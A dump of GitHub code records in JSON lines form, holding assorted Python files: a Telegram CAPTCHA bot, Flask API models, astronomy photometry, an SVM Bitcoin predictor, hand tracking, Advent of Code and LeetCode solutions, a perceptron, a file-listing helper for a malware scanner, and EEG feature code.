text=group_config[\"msg_challenge_failed\"],\n reply_markup=None,\n )\n try:\n await client.send_message(\n chat_id=_config[\"channel\"],\n text=_config[\"msg_failed_timeout\"].format(\n botid=str(_me.id),\n targetuser=str(from_id),\n groupid=str(chat_id)))\n except Exception as e:\n logging.error(str(e))\n if group_config[\"challenge_timeout_action\"] == \"ban\":\n await client.kick_chat_member(chat_id, from_id)\n elif group_config[\"challenge_timeout_action\"] == \"kick\":\n await client.kick_chat_member(chat_id, from_id)\n await client.unban_chat_member(chat_id, from_id)\n else:\n pass\n\n if group_config[\"delete_failed_challenge\"]:\n Timer(\n client.delete_messages(chat_id, reply_id),\n group_config[\"delete_failed_challenge_interval\"],\n )\n\n\ndef _main():\n global _app, _channel, _start_message, _config\n load_config()\n _api_id = _config[\"api_id\"]\n _api_hash = _config[\"api_hash\"]\n _token = _config[\"token\"]\n _channel = _config[\"channel\"]\n _start_message = _config[\"msg_start_message\"]\n _proxy_ip = _config[\"proxy_addr\"].strip()\n _proxy_port = _config[\"proxy_port\"].strip()\n if _proxy_ip and _proxy_port:\n _app = Client(\"bot\",\n bot_token=_token,\n api_id=_api_id,\n api_hash=_api_hash,\n proxy=dict(hostname=_proxy_ip, port=int(_proxy_port)))\n else:\n _app = Client(\"bot\",\n bot_token=_token,\n api_id=_api_id,\n api_hash=_api_hash)\n try:\n _update(_app)\n _app.run()\n except KeyboardInterrupt:\n quit()\n except Exception as e:\n logging.error(e)\n # _main()\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"Tooruchan/Telegram-CAPTCHA-Lite-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15244,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"29294004686","text":"from flask_restx import Namespace, reqparse, fields, inputs\n\napi = Namespace('ShipmentDetails', description='User Shipment details')\n\n# get_shipment_details_input = api.parser()\nget_shipment_details_input = reqparse.RequestParser()\nget_shipment_details_input.add_argument('TransactionId', type=str, default='string',location = 'form', required=True)\n\ncheck_status_and_insert_user_details = reqparse.RequestParser()\n# check_status_and_insert_user_details.add_argument('burning_tx_id', type=str, default='string',location = 'form', required=True)\ncheck_status_and_insert_user_details.add_argument('cluster', type=str, default='string',location = 'form', required=False)\ncheck_status_and_insert_user_details.add_argument('Name', type=str, default='string',location = 'form', required=False)\ncheck_status_and_insert_user_details.add_argument('Address', type=str, default='string',location = 'form', required=True)\ncheck_status_and_insert_user_details.add_argument('EmailId', type=str, default='string',location = 'form', required=True)\ncheck_status_and_insert_user_details.add_argument('Size', type=str, default='string',location = 'form', required=False)\ncheck_status_and_insert_user_details.add_argument('TransactionId', type=str, default='string',location = 'form', required=True)\n\ninsert_shipment_details = api.model(\n 'shipment_details', {\n 'burning_tx_id' : fields.String(attribute='burning_tx_id'),\n 'cluster' : fields.String(attribute='cluster'),\n 'first_name': fields.String(attribute='first_name'),\n 'last_name': fields.String(attribute='last_name'),\n 'Address': fields.String(attribute='Address'),\n 'ContactNumber': fields.String(attribute='ContactNumber')\n }\n)\n\nget_shipment_details_output = api.model(\n 'get_shipment_details',{\n 'ID': fields.Integer(attribute='ID'),\n 'Name': fields.String(attribute='NAME'),\n 'Address': fields.String(attribute='ADDRESS'),\n 'EmailId': fields.String(attribute='EMAIL_ID'),\n 'Size': fields.String(attribute='SIZE'),\n 'TransactionId': fields.String(attribute='TX_ID'),\n 'TimeStamp': fields.String(attribute='TIME_STAMP'),\n\n }\n)\n","repo_name":"jeetbarot1998/Factwise1-assignment","sub_path":"models/shipment_details.py","file_name":"shipment_details.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22793447657","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nh = 6.6260755e-27\nc = 2.99792458e18\nhc = h*c\n\n\nfiles = ['UVW2_2010.txt','UVM2_2010.txt','UVW1_2010.txt','U_UVOT.txt','B_UVOT.txt',\n 'V_UVOT.txt']\n\nfilter_WL = []\nfilter_A = []\n\nfor item in files:\n\n f = open(item,'r')\n\n filter_lambda = []\n filter_area = []\n for line in f:\n line = line.rstrip()\n column = line.split()\n wavelen = column[0]\n area = column[1]\n filter_lambda.append(float(wavelen))\n filter_area.append(float(area))\n\n filter_lambda = np.asarray(filter_lambda,dtype=float)\n filter_area = np.asarray(filter_area,dtype=float)\n \n nonzero = np.where(filter_area > 0.0)\n \n filter_lambda = filter_lambda[nonzero]\n filter_area = filter_area[nonzero]\n\n filter_WL.append(filter_lambda)\n filter_A.append(filter_area)\n\n f.close()\n\n\n###### VEGA for reference ######\n\n\nvega_wave,vega_area = np.loadtxt('vega.dat',dtype=float,usecols=(0,1),unpack=True)\n\n\n\n\n##########################################\n\n\nchoice = raw_input(\"Enter SN name: \") \n\nnpz = '%s.npz' % (choice) ### VARIABLE THAT TAKES YOUR CHOICE OF SUPERNOVA AND MAKES A STRING WITH .npz OF THAT SUPERNOVA.\n\nSNname = np.load(npz) ### LOAD THE .npz FILE FROM THE DIRECTORY ITS IN.\n\nsp_flux = SNname['fluxlist'][0] ### FLUX FROM ith SPECTRUM. CHANGE INDEX TO USE DIFFERENT SPECTRUM\n\nsp_wave = SNname['wavelengthlist'][0] ### WAVELENGTHS FROM ith SPECTRUM. CHANGE INDEX TO USE DIFFERENT SPECTRUM\n\n\nfiltercurves = ['UVW2_2010','UVM2_2010','UVW1_2010','U_UVOT','B_UVOT','V_UVOT'] ### STRING LIST\n\nzeropoints = [17.38, 16.85, 17.44, 18.34, 19.11, 17.89] ### PHOTOMETRIC ZEROPOINTS BASED ON VEGA\n\n\nfiltereffwavelength=[2030,2231,2634,3501,4329,5402] ### EFFECTIVE WAVELENGTH FOR EACH FILTER (IN SAME ORDER)\n\nmag_array = np.zeros(len(filtercurves))\n\ncounts_array = np.zeros(len(filtercurves))\n\n\nfilter_array = np.array([filter_A[0],filter_A[1],filter_A[2],filter_A[3],filter_A[4],filter_A[5]])\n\nfilter_wave = np.array([filter_WL[0],filter_WL[1],filter_WL[2],filter_WL[3],filter_WL[4],filter_WL[5]])\n\n \n\nfor x in range(len(filtercurves)): \n \n sp_ea = np.interp(sp_wave, filter_array[x], filter_wave[x]) ### spectrum effective area \n \n counts_array[x] = np.trapz(sp_ea*sp_flux*sp_wave/hc,sp_wave) ### Integrating under the curve using numpy\n \n mag_array[x] = -2.5*np.log10(counts_array[x])+zeropoints[x]\n \n \n\n'''\nNOTE on mag_array: mag_array has 6 components, one for each filter used. This means that the first\ncomponent is the calculated w2 magnitude, the second component is the m2 calculated magnitude, all\nthe way to v band calculated magnitude. The order of the magnitude reflects the order of filtercurves.\n'''\n\n","repo_name":"pbrown801/aggienova-templates","sub_path":"old/spectrophot_v2.py","file_name":"spectrophot_v2.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"71125140355","text":"from PyQt5.QtCore import pyqtSignal,QObject\r\n\r\nclass MyWorker(QObject):\r\n complete = pyqtSignal()\r\n\r\n def __init__(self,model):\r\n super().__init__(parent=None)\r\n self.file=None\r\n self.has_header=True\r\n self.model=model\r\n\r\n def set_file(self,file,has_header):\r\n self.file=file\r\n self.has_header=has_header\r\n\r\n def read_file(self):\r\n self.model.loadFile(self.file,has_header=self.has_header)\r\n print(\"Terminado de leer el archivo\")\r\n self.complete.emit()\r\n # self.model.notify_observers()\r\n","repo_name":"elagabalus01/myner","sub_path":"src/controllers/MyWorker.py","file_name":"MyWorker.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"45117870510","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sklearn\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import svm,preprocessing\r\nimport time\r\n\r\ndata_BTC = pd.read_csv('BTC_history.csv') #讀進2017/09/12-2022/09/12的BTC歷史資料\r\ndata_DJI = pd.read_csv('DJI_sample.csv') #讀進2017/09/12-2022/09/12的DJI歷史資料\r\n\r\n'''\r\n#繪製BTC和DJI五年間的走勢圖\r\nfigure1 = plt.figure()\r\n(BTCprice, DJIprice) = figure1.subplots(2, sharex=True)\r\ndata_BTC.plot(ax=BTCprice, x=\"Date\", y=\"Close\", label='BTC price')\r\ndata_DJI.plot(ax=DJIprice, x=\"Date\", y=\"Close\", label='DJI price')\r\nplt.show()\r\n\r\n#移動平均線\r\ndata_BTC['MA5'] = data_BTC['Close'].rolling(5).mean()\r\ndata_BTC['MA20'] = data_BTC['Close'].rolling(20).mean()\r\ndata_BTC['MA60'] = data_BTC['Close'].rolling(60).mean()\r\n\r\n#指數移動平均線\r\ndata_BTC['EMA12'] = data_BTC['Close'].ewm(span=12).mean()\r\ndata_BTC['EMA26'] = data_BTC['Close'].ewm(span=26).mean()\r\n\r\n#MACD\r\ndata_BTC['DIF'] = data_BTC['EMA12'] - data_BTC['EMA26']\r\ndata_BTC['DEM'] = data_BTC['DIF'].ewm(span=9).mean()\r\ndata_BTC['OSC'] = data_BTC['DIF'] - data_BTC['DEM']\r\n\r\n#作圖\r\nfig,ax = plt.subplots(3,1,figsize=(10,10))\r\nplt.subplots_adjust(hspace=0.8)\r\ndata_BTC['MA5'].plot(ax=ax[0])\r\ndata_BTC['MA20'].plot(ax=ax[0])\r\ndata_BTC['MA60'].plot(ax=ax[0])\r\ndata_BTC['EMA12'].plot(ax=ax[1])\r\ndata_BTC['EMA26'].plot(ax=ax[1])\r\ndata_BTC['Close'].plot(ax=ax[0])\r\ndata_BTC['Close'].plot(ax=ax[1])\r\nax[0].legend()\r\nax[1].legend()\r\ndata_BTC['DIF'].plot(ax=ax[2])\r\ndata_BTC['DEM'].plot(ax=ax[2])\r\nax[2].fill_between(data_BTC['Date'],0,data_BTC['OSC'])\r\nax[2].legend()\r\nplt.show()\r\n\r\n#相關係數\r\nBTC_series = pd.Series(data_BTC['Close'])\r\nDJI_series = pd.Series(data_DJI['Close'])\r\ncorr_BTC_DJI = round(BTC_series.corr(DJI_series), 2)\r\n\r\nprint(\"Corr of BTC&DJI:\", corr_BTC_DJI)\r\nplt.scatter(data_BTC['Close'], data_DJI['Close'])\r\nplt.title(\"Corr of BTC&DJI:\" + str(corr_BTC_DJI))\r\nplt.show()\r\n'''\r\n\r\n#SVM 預測比特幣走勢\r\ndf=data_BTC[['Close', 'Open', 'High', 'Low']]\r\n\r\n#diff代表今日和前日收盤價的差值\r\ndata_BTC['diff'] = data_BTC[\"Close\"]-data_BTC[\"Close\"].shift(1)\r\ndata_BTC['diff'].fillna(0, inplace = True)\r\n\r\n#up表示今日是否上漲,上漲表示1,下跌或平盤表示0\r\ndata_BTC['up'] = data_BTC['diff'] \r\ndata_BTC['up'][data_BTC['diff']>0] = 1\r\ndata_BTC['up'][data_BTC['diff']<=0] = 0\r\n\r\n#predictForUp表示預測結果,同樣1表漲0表平與跌,先初始化為0\r\ndata_BTC['predictForUp'] = 0 \r\n\r\n#target為實際之漲跌情況\r\ntarget = data_BTC['up']\r\nlength=len(data_BTC)\r\n\r\n#訓練集資料為原始資料的80%,預測集為20%\r\ntrainNum=int(length*0.8)\r\nPredictNum=length-trainNum\r\n\r\n#確認要進行訓練的特徵值,收盤價、開盤價、當日最高價、當日最低價\r\nfeature=data_BTC[['Close', 'Open', 'High', 'Low']]\r\n\r\n#對特徵值進行標準化\r\nfeature=preprocessing.scale(feature)\r\nfeatureTrain=feature[1:trainNum-1]\r\ntargetTrain=target[1:trainNum-1]\r\n\r\n#kernel='linear', C=100 ->0.98 線性可分\r\n#kernel='poly', degree=3, gamma='auto', C=50 ->0.76 高次方轉換\r\n#kernel='rbf', gamma=0.7, C=50 ->0.92 高斯轉換\r\n#gamma = 0.5、0.7、1、2 C=10^-1~10^2\r\n\r\nsvmTool = svm.SVC(kernel='linear', C=15) #核函式取用linear kernel創建SVM分類器,linear kernel在特徵數量多時較為適用\r\nsvmTool.fit(featureTrain,targetTrain) #通過fit函式,用特徵值和目標值訓練svmTool\r\n\r\npredictedIndex=trainNum\r\n\r\n#透過while逐一預測測試集\r\nwhile predictedIndex7.\n'''\n\ncodes = all_codes(4)\nprint(len(codes))\n\nbest_code = ''\nbest_euler = 4\n\nfor c in codes:\n if c.euler < best_euler:\n best_code = c\n best_euler = c.euler\n print(best_code)\n\n'''\nSequence B\n\nSmallest number of vertices with signing required to be min. emb. on genus g:\n0) 0, with ('', '').\n1) 2, with ('abab', '++--')\n2) 3, with ('abacbc', '++---+')\n3) 5, with ('ababcdeced', '++--+++---')\n4) 7, with ('ababcdcdefegfg', '++--++--++---+').\n'''\n\n# Clearly, we have that sequence A is stricly greater than sequence B.\n","repo_name":"Raikhen/final-project-cs49","sub_path":"toroidal.py","file_name":"toroidal.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43579378810","text":"import cv2\nimport mediapipe as mp\n\ncap = cv2.VideoCapture(0)\nmp_Hands = mp.solutions.hands\nhands = mp_Hands.Hands(max_num_hands = 2)\nmpDraw = mp.solutions.drawing_utils\n\nfingers_coord = [(8, 6), (12, 10), (16, 14), (20, 18)]\nthumb_coord = (4, 2)\n\nwhile cap.isOpened():\n succes, image = cap.read()\n image = cv2.flip(image, 1)\n if not succes:\n print('Не удалось получить кадр с web-камеры')\n continue \n\n RGB_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = hands.process(RGB_image)\n multiLandMarks = results.multi_hand_landmarks \n \n if multiLandMarks:\n for idx, handLms in enumerate(multiLandMarks): \n lbl = results.multi_handedness[idx].classification[0].label\n print(lbl)\n\n\n cv2.imshow('web-cam', image)\n if cv2.waitKey(1) & 0xFF == 27:\n break\n\ncap.release()\n\n\n \n","repo_name":"anpilogova123/finger_counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6610924005","text":"from aoc_inputs import get_input\n\ndata = get_input()\nrps = data.split('\\n')\n\n\ndef part_1():\n # A / X = rock = 1\n # B / Y = paper = 2\n # C / Z = scissors = 3\n # ----------------\n # lose = 0\n # draw = 3\n # win = 6\n shape_pts_map = {'X': 1, 'Y': 2, 'Z': 3}\n round_pts_map = {\n 'A': {'X': 3, 'Y': 6, 'Z': 0},\n 'B': {'X': 0, 'Y': 3, 'Z': 6},\n 'C': {'X': 6, 'Y': 0, 'Z': 3}\n }\n total_points = 0\n for game in rps:\n opp, you = game.split()\n round_pts = round_pts_map[opp][you]\n shape_pts = shape_pts_map[you]\n total_points += sum((round_pts, shape_pts))\n return total_points\n\n\ndef part_2():\n # A = rock = 1\n # B = paper = 2\n # C = scissors = 3\n # ----------------\n # X = lose = 0\n # Y = draw = 3\n # Z = win = 6\n round_pts_map = {'X': 0, 'Y': 3, 'Z': 6}\n shape_pts_map = {\n 'X': {'A': 3, 'B': 1, 'C': 2}, # lose\n 'Y': {'A': 1, 'B': 2, 'C': 3}, # draw\n 'Z': {'A': 2, 'B': 3, 'C': 1}, # win\n }\n total_points = 0\n for game in rps:\n opp, outcome = game.split()\n round_pts = round_pts_map[outcome]\n shape_pts = shape_pts_map[outcome][opp]\n total_points += sum((round_pts, shape_pts))\n return total_points\n\n\nif __name__ == '__main__':\n print(part_1())\n print(part_2())\n","repo_name":"lcirvine/advent_of_code","sub_path":"2022/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9415953786","text":"from inspect import signature\n\nimport pytest\n\nimport pyroute2\nfrom pyroute2 import netlink, netns\nfrom pyroute2.netlink import exceptions, rtnl\nfrom pyroute2.netlink.rtnl import ifinfmsg, ndmsg\n\n\ndef parameters(func):\n try:\n return set(signature(func).parameters.keys())\n except ValueError:\n pytest.skip('ginature check error, skip test')\n\n\ndef test_imports():\n assert parameters(pyroute2.NetNS) > set(('netns', 'flags', 'libc'))\n assert signature(pyroute2.IPRoute)\n assert issubclass(netlink.NetlinkError, Exception)\n assert issubclass(exceptions.NetlinkDumpInterrupted, Exception)\n assert netlink.NetlinkError == exceptions.NetlinkError\n assert netlink.nla_slot\n assert netlink.nla_base\n assert parameters(rtnl.rt_scope.get) == set(('key', 'default'))\n assert isinstance(rtnl.rt_proto, dict) and 'static' in rtnl.rt_proto\n assert parameters(netns._create) == set(('netns', 'libc', 'pid'))\n assert parameters(netns.remove) == set(('netns', 'libc'))\n assert parameters(netns.listnetns) == set(('nspath',))\n assert ifinfmsg.IFF_ALLMULTI == 0x200\n assert {state[1]: state[0] for state in ndmsg.states.items()} == {\n 0: 'none',\n 1: 'incomplete',\n 2: 'reachable',\n 4: 'stale',\n 8: 'delay',\n 16: 'probe',\n 32: 'failed',\n 64: 'noarp',\n 128: 'permanent',\n }\n","repo_name":"svinota/pyroute2","sub_path":"tests/test_neutron/test_ip_lib.py","file_name":"test_ip_lib.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"}
+{"seq_id":"22254775027","text":"from random import seed\nfrom random import randrange\nfrom csv import reader\n \ndef cargarArchivo(filename):\n\tdataset = list()\n\twith open(filename, 'r') as file:\n\t\tcsv_reader = reader(file)\n\t\tfor celda in csv_reader:\n\t\t\tif not celda:\n\t\t\t\tcontinue\n\t\t\tdataset.append(celda)\n\treturn dataset\n\ndef convertir2Float(dataset, columna):\n\tfor celda in dataset:\n\t\tcelda[columna] = float(celda[columna].strip())\n \ndef manejoInfo(dataset, columna):\n\tclass_values = [celda[columna] for celda in dataset]\n\tunique = set(class_values)\n\tlookup = dict()\n\tfor i, value in enumerate(unique):\n\t\tlookup[value] = i\n\tfor celda in dataset:\n\t\tcelda[columna] = lookup[celda[columna]]\n\treturn lookup\n\ndef validacion(dataset, n_folds):\n\tdataset_split = list()\n\tdataset_copy = list(dataset)\n\tfold_size = int(len(dataset) / n_folds)\n\tfor i in range(n_folds):\n\t\tfold = list()\n\t\twhile len(fold) < fold_size:\n\t\t\tindex = randrange(len(dataset_copy))\n\t\t\tfold.append(dataset_copy.pop(index))\n\t\tdataset_split.append(fold)\n\treturn dataset_split\n \n\ndef porcentaje(actual, prediccioned):\n\tcorrect = 0\n\tfor i in range(len(actual)):\n\t\tif actual[i] == prediccioned[i]:\n\t\t\tcorrect += 1\n\treturn correct / float(len(actual)) * 100.0\n \ndef algoritmoEvaluacion(dataset, algorithm, n_folds, *args):\n\tfolds = validacion(dataset, n_folds)\n\tscores = list()\n\tfor fold in folds:\n\t\ttrain_set = list(folds)\n\t\ttrain_set.remove(fold)\n\t\ttrain_set = sum(train_set, [])\n\t\ttest_set = list()\n\t\tfor celda in fold:\n\t\t\tcelda_copy = list(celda)\n\t\t\ttest_set.append(celda_copy)\n\t\t\tcelda_copy[-1] = None\n\t\tprediccioned = algorithm(train_set, test_set, *args)\n\t\tactual = [celda[-1] for celda in fold]\n\t\taccuracy = porcentaje(actual, prediccioned)\n\t\tscores.append(accuracy)\n\treturn scores\n \ndef prediccion(celda, weights):\n\tactivation = weights[0]\n\tfor i in range(len(celda)-1):\n\t\tactivation += weights[i + 1] * celda[i]\n\treturn 1.0 if activation >= 0.0 else 0.0\n \ndef entrenamientoPesos(train, l_rate, n_repeticion):\n\tweights = [0.0 for i in range(len(train[0]))]\n\tfor repeticion in range(n_repeticion):\n\t\tfor celda in train:\n\t\t\tprediccionion = prediccion(celda, weights)\n\t\t\terror = celda[-1] - prediccionion\n\t\t\tweights[0] = weights[0] + l_rate * error\n\t\t\tfor i in range(len(celda)-1):\n\t\t\t\tweights[i + 1] = weights[i + 1] + l_rate * error * celda[i]\n\treturn weights\n \ndef perceptron(train, test, l_rate, n_repeticion):\n\tprediccionions = list()\n\tweights = entrenamientoPesos(train, l_rate, n_repeticion)\n\tfor celda in test:\n\t\tprediccionion = prediccion(celda, weights)\n\t\tprediccionions.append(prediccionion)\n\treturn(prediccionions)\n \nseed(1)\n\nfilename = 'Iris.csv'\ndataset = cargarArchivo(filename)\nfor i in range(len(dataset[0])-1):\n\tconvertir2Float(dataset, i)\n\nmanejoInfo(dataset, len(dataset[0])-1)\n\nn_folds = 3\nl_rate = 0.01\nn_repeticion = 500\nscores = algoritmoEvaluacion(dataset, perceptron, n_folds, l_rate, n_repeticion)\nprint('Aprendizaje por columnaa: %s' % scores)\nprint('Porcentaje de Aprendizaje: %.3f%%' % (sum(scores)/float(len(scores))))\n","repo_name":"dnegu/TopIA","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37877006642","text":"import subprocess, os\nfrom checks import check_path, check_path_directory\n\n\n\n# Get the list of newly created files in the last m minutes \tO(N)\ndef Get_new_files_created_or_modified_in_minutes(directory, m):\n\tcmd = \"find \" + directory + \" -type f -cmin -\" + m\n\tfiles = subprocess.check_output(cmd, shell=True)\n\tfiles = files.decode(\"UTF-8\")\n\tfiles = files.split(\"\\n\")\t# O(N)\n\tfile_list = []\n\tfor file in files:\t\t\t# O(N)\n\t\tif not(file == \"\"):\n\t\t\tfile_list.append(file)\n\treturn file_list\n\n#-------------------------------------------------------------------------------------------------\n\n# List all files in a directory recursively \t\t# O(N)\ndef list_files_in_directory(directory):\n\tif(check_path_directory(directory)):\n\t\tfiles = []\n\t\tentries_in_directory = os.listdir(directory)\n\t\tfor entry in entries_in_directory:\n\t\t\tentry_full_Path = os.path.join(directory, entry)\n\t\t\tif check_path_directory(entry_full_Path):\n\t\t\t\tfiles = files + list_files_in_directory(entry_full_Path)\n\t\t\telse:\n\t\t\t\tif(check_path(entry_full_Path)):\n\t\t\t\t\tfiles.append(entry_full_Path)\n\t\treturn files\n","repo_name":"Abdelrhman-CaT/Simple-Anti-Malware-Signature-Based-Detection","sub_path":"scanner/file_management.py","file_name":"file_management.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2632613196","text":"from dataclasses import dataclass\nimport fileinput\nimport re\n\n\n@dataclass\nclass Ingredient():\n\tname: str\n\tcapacity: int\n\tdurability: int\n\tflavor: int\n\ttexture: int\n\tcalories: int\n\n\tdef __post_init__(self):\n\t\tif not isinstance(self.capacity, int):\n\t\t\tself.capacity = int(self.capacity)\n\t\tif not isinstance(self.durability, int):\n\t\t\tself.durability = int(self.durability)\n\t\tif not isinstance(self.flavor, int):\n\t\t\tself.flavor = int(self.flavor)\n\t\tif not isinstance(self.texture, int):\n\t\t\tself.texture = int(self.texture)\n\t\tif not isinstance(self.calories, int):\n\t\t\tself.calories = int(self.calories)\n\n\ndef parse_ingredients(lines):\n\tpattern = re.compile(r'(?P[A-Za-z]+): capacity (?P-?[0-9]+), durability (?P-?[0-9]+), flavor (?P-?[0-9]+), texture (?P-?[0-9]+), calories (?P-?[0-9]+)')\n\tingredients = []\n\n\tfor line in lines:\n\t\tmatch = pattern.match(line)\n\n\t\tif match is None:\n\t\t\traise ValueError(\"Invalid line %s\", line)\n\t\telse:\n\t\t\tingredients.append(Ingredient(**match.groupdict()))\n\n\treturn ingredients\n\n\ndef calc_score(ingredients: list[Ingredient], quanities):\n\tcapacity = sum(quanity * ingredient.capacity for ingredient, quanity in zip(ingredients, quanities))\n\tdurability = sum(quanity * ingredient.durability for ingredient, quanity in zip(ingredients, quanities))\n\tflavor = sum(quanity * ingredient.flavor for ingredient, quanity in zip(ingredients, quanities))\n\ttexture = sum(quanity * ingredient.texture for ingredient, quanity in zip(ingredients, quanities))\n\tcalories = sum(quanity * ingredient.calories for ingredient, quanity in zip(ingredients, quanities))\n\n\tif any(value < 0 for value in (capacity, durability, flavor, texture)):\n\t\treturn 0, calories\n\n\treturn capacity * durability * flavor * texture, calories\n\ndef part1(lines):\n\tingredients = parse_ingredients(lines)\n\n\tmax_score = 0\n\n\tfor first_quantity in range(101):\n\t\tfor second_quanitity in range(100 - first_quantity):\n\t\t\tfor third_quantity in range(100 - (first_quantity + second_quanitity)):\n\t\t\t\tfourth_quantity = 100 - (first_quantity + second_quanitity + third_quantity)\n\n\t\t\t\tquantities = [first_quantity, second_quanitity, third_quantity, fourth_quantity]\n\n\t\t\t\tscore, _ = calc_score(ingredients, quantities)\n\n\t\t\t\tif score > max_score:\n\t\t\t\t\tmax_score = score\n\treturn max_score\n\ndef part2(lines):\n\tingredients = parse_ingredients(lines)\n\n\tmax_score = 0\n\n\tfor first_quantity in range(101):\n\t\tfor second_quanitity in range(100 - first_quantity):\n\t\t\tfor third_quantity in range(100 - (first_quantity + second_quanitity)):\n\t\t\t\tfourth_quantity = 100 - (first_quantity + second_quanitity + third_quantity)\n\n\t\t\t\tquantities = [first_quantity, second_quanitity, third_quantity, fourth_quantity]\n\n\t\t\t\tscore, calories = calc_score(ingredients, quantities)\n\n\t\t\t\tif calories == 500 and score > max_score:\n\t\t\t\t\tmax_score = score\n\treturn max_score\n\n\ndef main():\n\tprint(part1(fileinput.input()))\n\tprint(part2(fileinput.input()))\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"paul-schwendenman/advent-of-code","sub_path":"2015/day15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26932577423","text":"'''\r\nQ1547. Description: Given a wooden stick of length n units. The stick is labelled from 0 to n.\r\nGiven an integer array cuts where cuts[i] denotes a position you should perform a cut at.\r\n\r\nYou should perform the cuts in order, you can change the order of the cuts as you wish.\r\nThe cost of one cut is the length of the stick to be cut, the total cost is the sum of costs of all cuts. When you cut a stick, it will be split into two smaller sticks (i.e. the sum of their lengths is the length of the stick before the cut). Please refer to the first example for a better explanation.\r\n\r\nReturn the minimum total cost of the cuts.\r\n'''\r\n\r\nclass Solution:\r\n def minCost(self, n: int, cuts: List[int]) -> int:\r\n m = len(cuts)\r\n # Store cutting positions\r\n cuts = [0] + sorted(cuts) + [n]\r\n # Cost of cutting stick in 2 parts - left and right\r\n dp = [[0] * (m + 2) for _ in range(m + 2)]\r\n\r\n for diff in range(2, m+2):\r\n for left in range(m + 2 - diff):\r\n right = left + diff\r\n # If cut not possible, set to infinity\r\n ans = float('inf')\r\n for mid in range(left + 1, right):\r\n ans = min(ans, dp[left][mid] + dp[mid][right] + cuts[right] - cuts[left])\r\n dp[left][right] = ans\r\n return dp[0][m+1]","repo_name":"aditi-govindu/LeetCode-DSA","sub_path":"MayChallenge_2023/MinimumCostCutStick.py","file_name":"MinimumCostCutStick.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2477010085","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\nclass MyLinkedList:\n\n def __init__(self):\n # 头部伪节点\n self._head = Node(0)\n self._count = 0\n\n def get(self, index: int) -> int:\n if 0 <= index < self._count:\n cur = self._head.next\n for _ in range(index):\n cur = cur.next\n return cur.val\n else:\n return -1\n\n def addAtHead(self, val: int) -> None:\n self.addAtIndex(0, val)\n\n def addAtTail(self, val: int) -> None:\n self.addAtIndex(self._count, val)\n\n def addAtIndex(self, index: int, val: int) -> None:\n if index < 0:\n index = 0\n # _count为链表末尾\n elif index > self._count:\n return\n cur = self._head\n for _ in range(index):\n cur = cur.next\n nxt = cur.next\n cur.next = Node(val)\n cur.next.next = nxt\n self._count += 1\n\n def deleteAtIndex(self, index: int) -> None:\n if index < 0:\n index = 0\n elif index >= self._count:\n return\n cur = self._head\n for _ in range(index):\n cur = cur.next\n cur.next = cur.next.next\n self._count -= 1\n\n\n# Your MyLinkedList object will be instantiated and called as such:\n# obj = MyLinkedList()\n# param_1 = obj.get(index)\n# obj.addAtHead(val)\n# obj.addAtTail(val)\n# obj.addAtIndex(index,val)\n# obj.deleteAtIndex(index)","repo_name":"OhYoooo/Leetcode","sub_path":"python/2.Linked-list/707.Design-Linked-List.py","file_name":"707.Design-Linked-List.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24237498831","text":"from features.frequency.welch import estimate_welch\nfrom utils.dict_validation import _assert_valid_dict\n\nfrom numpy import (ndarray, asarray, array, transpose)\n\n\ndef COG(eeg_dict: dict,\n fs: int = 250,\n window: str = 'hann',\n noverlap: int = 256,\n nfft: int = 512,\n nperseg: int = 512,\n fmin: int = 1,\n fmax: int = 18\n ) -> (ndarray, ndarray):\n \"\"\"\n Computes left-right and anterior-posterior power distributions along the scalp using\n van Putten's center-of-gravity feature.\n\n :param eeg_dict: Dictionary of channels (keys) and arrays of signal values (values), passed per segment.\n :param fs: Sampling frequency of the series, default 250 Hz.\n :param window: Window function, default 'hann'.\n :param noverlap: Number of points to overlap between segments, default 256.\n If None, noverlap = nperseg // 2\n :param nfft: Length of the FFT used, default 512.\n :param nperseg: Length of each segment, default 512.\n :param fmin: Minimum frequency bound for power spectrum, default 1.\n :param fmax: Maximum frequency bound for power spectrum, default 12.\n\n :return: Power in left-right direction, weighted by channel positions.\n :return: Power in anterior-posterior direction, weighted by channel positions.\n\n References\n ----------\n [1] Van Putten (2007), The colorful brain: compact visualisation of routine EEG recordings.\n .. 